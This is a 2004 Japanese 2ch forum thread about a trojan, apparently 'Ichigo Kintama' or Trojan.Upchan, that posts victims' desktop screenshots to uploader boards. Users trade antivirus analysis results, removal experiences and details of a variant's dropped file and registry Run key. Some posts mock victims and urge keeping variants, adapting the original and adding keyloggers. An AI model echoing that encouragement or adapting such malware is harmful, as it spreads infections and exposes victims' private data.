835:[名無し]さん(bin+cue).rar
04/09/23 14:25:04 ungvXIMz
test
836:[名無し]さん(bin+cue).rar
04/09/23 14:58:32 xduUn+v/
>>825
その実験は興味深いな、7zなら重複ファイル簡単に探せるね。
CRCを見てて、同じだったらファイル名だけ残して捨てるんだな
つか、一見、普通のファイル集合体のようで、展開したら
むちゃくちゃ容量食う圧縮爆弾を簡単に作れるじゃねーか。怖。
ちなみにrarだと800KBぐらい
837:[名無し]さん(bin+cue).rar
04/09/23 15:02:36 mmGHQUsE
exe ファイル 捨てたい
838:[名無し]さん(bin+cue).rar
04/09/23 15:08:30 jZRbqOye
苺きんたまきんたま
URLリンク(www.geocities.jp)
これを。
839:[名無し]さん(bin+cue).rar
04/09/23 15:25:44 UZ3hgOe/
>>837
602 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:04/09/23(木) 00:03:45 ID:mmGHQUsE
俺は正直このくらいでいい。
観てるほうは面白いし晒された方はちょっと恥ずかしいけど
そんなにダメージでかくない。あとは画像が見れれば最強なんだが。
610 名前:[名無し]さん(bin+cue).rar[] 投稿日:04/09/23(木) 00:09:58 ID:mmGHQUsE
>>604
作者は力入れるとこ間違ってる気がする。
629 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:04/09/23(木) 00:29:36 ID:mmGHQUsE
おいおまいら関祭りには参加しなかったのか?
634 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:04/09/23(木) 00:35:59 ID:mmGHQUsE
tesu
840:[名無し]さん(bin+cue).rar
04/09/23 15:26:49 UZ3hgOe/
637 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:04/09/23(木) 00:39:46 ID:mmGHQUsE
てす
639 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:04/09/23(木) 00:42:44 ID:mmGHQUsE
ニュー速で規制されたorz
90秒ってなげーよ・・・
662 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:04/09/23(木) 01:10:41 ID:mmGHQUsE
しかし久々にflashget使ったよw
668 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:04/09/23(木) 01:35:42 ID:mmGHQUsE
もううpはやんだの?
679 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:04/09/23(木) 02:47:44 ID:mmGHQUsE
あ〜面白かった。三日分は笑ったな。
837 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:04/09/23(木) 15:02:36 ID:mmGHQUsE
exe ファイル 捨てたい
841:[名無し]さん(bin+cue).rar
04/09/23 16:00:42 gRp4IpXR
なになに?笑って見てたら笑えない状況になったのかID:mmGHQUsEは?
842:[名無し]さん(bin+cue).rar
04/09/23 16:06:35 QGmLVuGv
txtなどのアイコンの変更はどうやるのでしょうか?
843:[名無し]さん(bin+cue).rar
04/09/23 16:18:48 qaAkrrtW
>>840
837で爆笑
844:[名無し]さん(bin+cue).rar
04/09/23 16:22:49 L1ZU8rVo
>841
ドゾー
スレリンク(gline板)l50
845:627
04/09/23 16:24:41 Q+leSqll
ノートン先生から解析結果が届いたのでコピペします。
-------------------------------------------------------------------
Subject:[CLOSING]: Symantec Security Response Automation:Tracking No. ********
日付: 22-09-2004
(個人情報に付き削除) 様
ファイルを分析しました。送られたそれぞれのファイルについてわかったことを
以下に報告します。
ファイル名: Q:\2ch\(写真集) (ロリータ) 水原友里.exe
コンピュータ: (個人情報に付き削除)
結果: このファイルは次のウィルスに感染しています:
Trojan.Upchan
デベロッパーノート
:
Q:\2ch\(写真集) (ロリータ) 水原友里.exe is non-repairable threat.
NAV with the latest rapidrelease definition detects this. Please delete this file and replace it if neccessary.
Please follow the instruction at the end of this email message to install the latest rapidrelease definitions.
ご提出いただいたサンプルについて、シマンテック・セキュリティ・レスポンスはウイルス、ワームまたはトロイの木馬に感染していると判断いたしました。
今回の提出されたサンプルに含まれる脅威に個別対応した定義ファイルを作成いたしましたので、
このメールの末尾に書かれた手順にしたがってインストールしてください。
個別対応版定義ファイルのインストール方法:
1. 添付された定義ファイルの更新版を保存します。
2. 保存したファイルをダブルクリックし、画面の指示に従って操作します。
-------------------------------------------------------------------
846:[名無し]さん(bin+cue).rar
04/09/23 16:26:59 t4uJAFpV
>>845
Upchanって・・・。それにしても対応早いな。
バスターまだ〜(AA略)
847:[名無し]さん(bin+cue).rar
04/09/23 16:28:51 Pi3bt/OK
>保存したファイルをダブルクリックし、画面の指示に従って操作します。
ICHIGOウイルースに感染した香具師はトラウマに…
848:[名無し]さん(bin+cue).rar
04/09/23 16:30:52 62NRg8JO
>>845 おぉ先生きたか
>Trojan.Upchan あっぷちゃん、もしくはうぷちゃん
苺キンタマは却下かw
849:627
04/09/23 16:33:37 Q+leSqll
添付されていた定義パッチで
(写真集) (ロリータ) 水原友里.exe
(写真集) (ロリータ) 相田香奈子.exe
コピー 〜 (写真集) (ロリータ) 河瀬菜美.exe
を「Trojan.Upchan」として検出できることを確認。
というわけで一般向けには次回定義更新時の定義でサポートされると思われ。
>>846
バスターの検体提出方法は不明だが
ノートン先生見たく検疫ソフトで送信できるなら誰か持ってる奴が送信した方がはやいよ。
850:[名無し]さん(bin+cue).rar
04/09/23 16:41:53 soiSa9lC
35 名前:水先案名無い人[sage] 投稿日:04/09/23 02:23:45 ID:ccAq4UYb
簡単な説明
とある人物がうpロダにうpられているexeを実行
そのexeはキンタマウィルスと同じようなデスクトップ画像を晒されるウィルス入り
このウィルスは8分置きに2chうpロダにデスクトップ画像をうpられ角煮のアップローダスレに自動で書き込まれる
そしてこのウィルスにかかっている事を知った当の本人は必死になって削除方法検索
その時の検索ワードが「exe ファイル 捨てたい」
この検索結果の画像を上記に書かれているウィルスによって自動でスレに書き込まれスレ住人を爆笑の渦へ
おわり
↑わるいがワロタ
851:[名無し]さん(bin+cue).rar
04/09/23 16:45:57 cDvdfQLH
俺でさえも(ry は対策しないんだなw
852:[名無し]さん(bin+cue).rar
04/09/23 16:52:19 pr4shzQV
バスター更新キタ━━━(゚∀゚)━━━ !!!!!
けど、対応してるのかな
853:[名無し]さん(bin+cue).rar
04/09/23 16:53:18 mva2OVxj
>>852
人柱
854:[名無し]さん(bin+cue).rar
04/09/23 17:16:25 /+AT9169
で、対応はどうなんだ?
漏れバスター無いから確かめられんのよね…
855:627
04/09/23 17:24:35 Q+leSqll
とりあえず定義パッチ。
URLリンク(rupan.zive.net)
Pass:NAV32
Name MD5 Bytes
---------- -------------------------------- ----------
apache.zip C12EB402A934A29D4DC44FEAD7BD1964 5,353,391
-------------------------------------------------------
Total 1 Files 5,353,391 Bytes
Name MD5 Bytes
----------- -------------------------------- ---------
updat32.exe FFA6D54E96FB2E825A0ADD93C93D689E 5,502,200
--------------------------------------------------------
Total 1 Files 5,502,200 Bytes
856:[名無し]さん(bin+cue).rar
04/09/23 17:34:08 Q+leSqll
>>852
ノートン先生はこの騒ぎのあとに定義更新があったけど未対応だった…
#確認するにもブツを持ってないとできないしな
857:[名無し]さん(bin+cue).rar
04/09/23 17:37:40 Pi3bt/OK
>>856
きました
858:[名無し]さん(bin+cue).rar
04/09/23 17:44:31 t4uJAFpV
>>852
パターンみたけどUpchanみたいに判りやすい名前は無かったな。
多分、未対応だと思う。
859:test ◆NJ8QhBoOZU
04/09/23 17:44:38 VAVDavsr
test
860:[名無し]さん(bin+cue).rar
04/09/23 17:46:46 qaAkrrtW
「exe ファイル 捨てたい」
(・∀・)イイ!!ワラタワラタ
861:[名無し]さん(bin+cue).rar
04/09/23 17:51:20 xduUn+v/
>>856
テストマシンに定義パッチ当てた。飼ってる苺キンタマは見事にヒット
(はじめrarの中に入れておいたからヒットしなかったよ)
Upchanの詳細情報まではなし。Up 2ch/苺ch という意味か…
862:[名無し]さん(bin+cue).rar
04/09/23 18:04:49 u+ulJzWX
スレリンク(gline板:572番)
863:[名無し]さん(bin+cue).rar
04/09/23 18:06:11 AH6SroMo
Trojan.ichigokintama
Trojan.berryballs
864:[名無し]さん(bin+cue).rar
04/09/23 18:30:39 GPZkaXV9
URLリンク(picopico.dip.jp)
これのragnarok\config.txt・・・.exeにひっかかりました。
ダブルクリックした瞬間にひっかかったと気づいたので急いで回線を抜きました。
亜種でしょうか?プロセスを見てもD:\WINDOWS\shellsystem.exeとは出ませんでした。(D:\にOSを入れてます)
かわりにD:\WINDOWS\sugoimonoss.comというコマンドプロンプトのファイルが生成されました。
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\sugoimonoss.com を
レジストリからも消しました。
とりあえず削除してPCを落としました。
セーフモードで起動したらsugoimonoss.comが復活していたので削除しました。上の元ファイルも削除しました。
レジストリを確認してみると同じ場所にはありませんでした。
そして再起動したらsugoimonoss.comは復活してなかったのでもう平気でしょうか?
いまはサブパソコンから書き込みしています。
865:[名無し]さん(bin+cue).rar
04/09/23 18:38:07 IFT2b9V5
>>864
みんな超能力者じゃないから断言できないけどたぶん大丈夫。
866:627
04/09/23 18:41:45 Q+leSqll
>>852
バスターは持ってないのでトレンドマイクロの
オンラインスキャンを利用してスキャンしてみたが未検出でしたので未対応のようです。
なのでバスター使いの誰かが提出するか
トレンドマイクロの中の人が気づくまで対応されないと思われます。
#提出しようと思ったが
#なんか製品登録したやつしか提出できない感じ…
867:[名無し]さん(bin+cue).rar
04/09/23 18:47:10 mva2OVxj
Share(仮称) ウイルス情報
スレリンク(download板)
868:[名無し]さん(bin+cue).rar
04/09/23 18:48:59 HP1mtfoW
>>866
ウイルス情報は各社が共有する紳士協定みたいなのがあるから
バスターも対応すると思われ
869:[名無し]さん(bin+cue).rar
04/09/23 18:54:10 rPkWk6Jz
最初の被害者で晒しまくった挙句、角煮にも降臨したのが
ユーザー名 YUSUKE という香具師だった
そこで、チャネラの間では、このウイルスをYUSUKEキンタマリアと名付ける動きがあった
870:[名無し]さん(bin+cue).rar
04/09/23 18:54:42 7p6CJmmF
>>866
バスターには昨日夜提出しておいたが、流石に一日じゃ解析からパターンファイル作成まで行かないみたいだな・・・
868の言うとおり、もう少し待てば対応するはず・・・
871:[名無し]さん(bin+cue).rar
04/09/23 18:56:07 +Y3dTfL1
えーと、苺キンタマってローカルネットワーク対応?
ぶっちゃけ言うと1台に感染したらLAN接続してる別PCにも勝手に伝播しますか?
872:バスター使い
04/09/23 18:56:44 rQ28x1D5
>>870
提出乙!
873:[名無し]さん(bin+cue).rar
04/09/23 18:58:13 JaZKld0M
ジュブナイルのユースケ!を思い出す
874:[名無し]さん(bin+cue).rar
04/09/23 19:09:20 GPZkaXV9
>>864
これって新種?
875:[名無し]さん(bin+cue).rar
04/09/23 19:12:44 xduUn+v/
>>864
落ちてこないよ。解析したいのに。
876:[名無し]さん(bin+cue).rar
04/09/23 19:20:25 xduUn+v/
>>864
で、見てみた。
苺キンタマと中身はそっくり、ただし、>>855のノートン先生の定義パッチでは無反応
新種というか亜種 確定。
やはり、類似品を簡単に作れるような設計になってるみたいだな。
こりゃ、しばらく祭り継続だな
877:[名無し]さん(bin+cue).rar
04/09/23 19:23:59 T4ToCva4
>>876
うp先はどこなん?
878:[名無し]さん(bin+cue).rar
04/09/23 19:31:53 LXjx4AWF
シマンテック ウイルス感染の疑いがあるファイルを Symantec Security Response に提出する方法
URLリンク(service1.symantec.com)
879:[名無し]さん(bin+cue).rar
04/09/23 19:33:26 /oIKzfHB
亜種にはfusiana機能も付けてほしい
あとwebカメラ設置者はそっちが起動されるとかね〜
880:[名無し]さん(bin+cue).rar
04/09/23 19:34:29 62NRg8JO
休みが明けて電源を入れたら壮大な祭りになる悪寒…
公的機関、企業の内部情報…個人情報と個人の性癖はもう晒されてるし
ど素人は原種がAVで引っかかっても、亜種には対応してないから安心しそうだ
まだまだ祭りは終わらないねこりゃ…
881:[名無し]さん(bin+cue).rar
04/09/23 19:40:09 GPZkaXV9
>>876
再起動したら自動でsugoimonoss.comが起動して感染する仕組みだったのでしょうか?
それともそれ単体で動作するのですか?
踏んだ直後にプロセスを見ても何もありませんでした。
レジストリのRun\のなかにsugoimonoss.comがあったので気づいたのですが・・・。
882:[名無し]さん(bin+cue).rar
04/09/23 19:40:27 +moW+9Lf
亜種はノートン反応無しとは
楽しい日々はまだまだ続くかな?
883:[名無し]さん(bin+cue).rar
04/09/23 19:40:40 dlC1dSfw
すごいことになりそうだな…
884:[名無し]さん(bin+cue).rar
04/09/23 19:40:45 RzyOzwfF
>>881
うっせラグナロクのチーターは死ねよww
885:[名無し]さん(bin+cue).rar
04/09/23 19:42:44 GPZkaXV9
ラグナロク知ってる人しかわからないレスごめんなさい
>>884
あのあぷろだには普段はチートツールはうpされないから多分罠ツールだと思って落としてみて、config開いたらウィルスだった。
罠ツールを集めるのが趣味なんです。
886:[名無し]さん(bin+cue).rar
04/09/23 19:44:42 bDi76u+h
これは早めに次スレがいるね。
887:[名無し]さん(bin+cue).rar
04/09/23 19:44:59 LvJ+JBBu
>>864
亜種キタ━━━(゚∀゚)━━━ !!!!!
つーか、当然そうなる罠
888:[名無し]さん(bin+cue).rar
04/09/23 19:48:49 RzyOzwfF
亜種保管しておこうぜ
いろいろ使えそう
889:[名無し]さん(bin+cue).rar
04/09/23 19:51:55 mgVunU57
亜種はいずれ対応されてしまう。
それよりオリジナルを確保しておいて自分で適宜改良して使うが吉。
で、だれか新型に感染してみたか?
節穴機能は追加されたんだろうか……
890::[名無し]さん(bin+cue).rar
04/09/23 19:52:34 pNUKkC8s
ウィルスバスターかけていたらwindowsやシステム32のほとんどが
dllやexeなんですがこれっておかしいのでしょうか?
891:[名無し]さん(bin+cue).rar
04/09/23 19:53:31 h0nUPIzO
てかなんでお前らウィルス肯定してんだ
対策しないと2chが訴えられてまた閉鎖騒ぎになるってのに
892:[名無し]さん(bin+cue).rar
04/09/23 19:54:58 wZ9Gu9IX
本当に
893:[名無し]さん(bin+cue).rar
04/09/23 19:55:07 bL7m252I
ほむ、2chが閉鎖となると大変なことになってしまいますね・・・
なんとか対策をたてましょう
894:[名無し]さん(bin+cue).rar
04/09/23 19:55:09 VuLxnNRm
>>890
パソコン雑誌 買いなさい!必ず買いなさい!
895:[名無し]さん(bin+cue).rar
04/09/23 19:55:33 l0b9RDPZ
キーロガーとか、kakikomi.txtうp機能とか
どんどん機能拡張していって欲しい
896:[名無し]さん(bin+cue).rar
04/09/23 19:56:14 r7vcxVQ0
きんたま感染したぽ・・
>>855はDLできないしレジストリで消しても復活するし・・
897:[名無し]さん(bin+cue).rar
04/09/23 19:59:02 h0nUPIzO
別スレにも書いたんだけど
96 :名無したん(;´Д`)ハァハァ :04/09/23 19:56:41 ID:11SxMVKb
>>91
・2chうpろだにうpされてるあたり2ch閲覧者の犯行
・2chねらーが個人情報画像わざわざ晒しあげしてやがる
・これまですべての板内のトラブルはひろゆきへ損害賠償
・今回の場合被害者の数が今までと比較にならない
次ページ最新レス表示スレッドの検索類似スレ一覧話題のニュースおまかせリスト▼オプションを表示暇つぶし2ch
4906日前に更新/237 KB
担当:undef